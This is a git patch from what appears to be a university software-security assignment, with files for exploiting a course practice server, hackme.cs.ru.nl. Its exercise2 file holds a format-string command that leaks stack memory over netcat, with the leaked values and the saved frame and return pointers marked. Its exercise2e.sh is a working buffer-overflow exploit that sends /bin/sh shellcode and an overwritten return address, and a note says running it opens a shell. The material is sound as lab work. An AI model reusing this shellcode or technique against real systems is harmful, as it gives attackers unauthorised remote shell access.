From 764292bdc5b0bd6dcf9d1e0667f9990a96036245 Mon Sep 17 00:00:00 2001 From: Mart Lubbers Date: Mon, 16 Mar 2015 11:12:29 +0100 Subject: [PATCH] Finished assignemnt 5b --- .../exercise2 | 82 ++++++++++++++----- .../exercise2e.sh | 21 +++-- .../exercise2f | 1 + 3 files changed, 72 insertions(+), 32 deletions(-) create mode 100644 ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 index 21c3798..834ddc7 100644 --- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 @@ -3,26 +3,66 @@ The buffer is probably 104 characters wide. All characters over 104 will not be echoed. b,c) -printf "%20s\n" | sed 's/ /%lx&/g' | nc hackme.cs.ru.nl 2266 +printf "%52s\n" | sed 's/ /%p/g' | nc hackme.cs.ru.nl 2266 |\ sed 's/(nil)\|0x/\n&/g' Memory: -7ffff7ff8050 -7ffff7dd8de0 -fbad2088 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -20786c2520786c25 -7fffffffeb00 saved frame pointer -4004c1 return address -1 return value -7fffffffeb30 -7fffffffebc0 +0x7ffff7ff8066 +0x7ffff7dd8de0 +0xfbad2088 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x7025702570257025 +0x702570257025 +0x7fffffffeb40 +0x7fffffffebd0 Saved frame pointer +0x4006a9 Return pointer +(nil) +0x100400530 +0x7fffffffebe0 +0x4006c2 +(nil) +0x7ffff7a70ead +(nil) +0x7fffffffecc8 +0x100000000 +0x4006b9 +(nil) +0x1aad25fd1bef7a81 +0x400530 +0x7fffffffecc0 +(nil) +(nil) +0xe552da02cc0f7a81 +0xe552cab3073f7a81 +0x7fff00000000 +(nil) +(nil) +0x4006e0 +0x7fffffffecc8 +0x1 +(nil) +(nil) +0x400530 +0x7fffffffecc0 +(nil) +0x400559 + +30 bytes shell codes +14 bytes in de zooi +94 bytes zooi + +104 zooi +8 bytes waarde? +8 frame pointer? +8 return pointer diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh index 2f62e90..0839a7b 100644 --- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh @@ -1,11 +1,10 @@ -shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" - -#Illegal instruction -returnvalue="\x7f\xff\xf7\xff\xeb\x30" -fillers=$(printf "%42s" | sed 's/ /\\x0f\\x1f/g') - -returnvalue="\x7f\xff\xf7\xff\xeb\x30" -fillers=$(printf "%39s" | sed 's/ /\\x0f\\x1f/g') - - -cat <(echo -e "${fillers}${shellcode}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266 +{ # Print padding and stack inspection + printf "......%34s" | sed 's/ /%p/g' + # Print shell code + printf "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1" + printf "\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" + # Overwrite frame pointer and top of stack pointer print return address + printf "%16s\x50\xeb\xff\xff\xff\x7f\n" + # Start reading from stdin and echoing it to stdout + cat +} | nc hackme.cs.ru.nl 2266 diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f new file mode 100644 index 0000000..7213a3c --- /dev/null +++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f @@ -0,0 +1 @@ +Just run exercise2e.sh with bash and it will open a shell. -- 2.20.1